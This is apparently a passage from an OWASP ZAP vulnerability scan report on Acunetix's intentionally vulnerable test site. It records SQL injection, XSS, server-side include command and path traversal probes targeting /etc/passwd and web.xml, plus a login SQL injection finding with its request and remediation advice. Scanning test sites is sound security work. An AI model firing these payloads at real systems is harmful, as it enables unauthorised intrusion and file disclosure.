          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:59 PM</DIV><DIV class="CommentText"> UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:56 PM</DIV><DIV class="CommentText">"</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">"</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">" UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">) UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:58 PM</DIV><DIV class="CommentText"> AND 1=1 -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          id
          Attack
          4-2
          Solution

          Do not trust client side input, even if there is client side validation in place.

          In general, type check all data on the server side.

          If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

          If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

          If database Stored Procedures can be used, use them.

          Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

          Do not create dynamic SQL queries using simple string concatenation.

          Escape all data received from the client.

          Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

          Apply the principle of least privilege by using the least privileged database user possible.

          In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

          Grant the minimum database access that is necessary for the application.

        2. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          SQL injection may be possible.

          Other info

          The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' OR '1'='1' -- ]

          The parameter value being modified was stripped from the HTML output for the purposes of the comparison.

          Data was NOT returned for the original parameter.

          The vulnerability was detected by successfully retrieving more data than originally returned, by manipulating the parameter.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1226
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1226 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP%27+AND+%271%27%3D%271%27+--+&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:08:04 GMT
          Content-Length: 13298
          
          
          Response body (13298 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="..." />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP' AND '1'='1' -- " id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbUsername
          Attack
          ZAP' OR '1'='1' -- 
          Solution

          Do not trust client side input, even if there is client side validation in place.

          In general, type check all data on the server side.

          If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

          If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

          If database Stored Procedures can be used, use them.

          Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

          Do not create dynamic SQL queries using simple string concatenation.

          Escape all data received from the client.

          Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

          Apply the principle of least privilege by using the least privileged database user possible.

          In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

          Grant the minimum database access that is necessary for the application.

  2. Risk=High, Confidence= (15)

    1. http://testaspnet.vulnweb.com (15)

      1. Viewstate without MAC Signature (Unsure) (15)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate, but possibly without a MAC.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
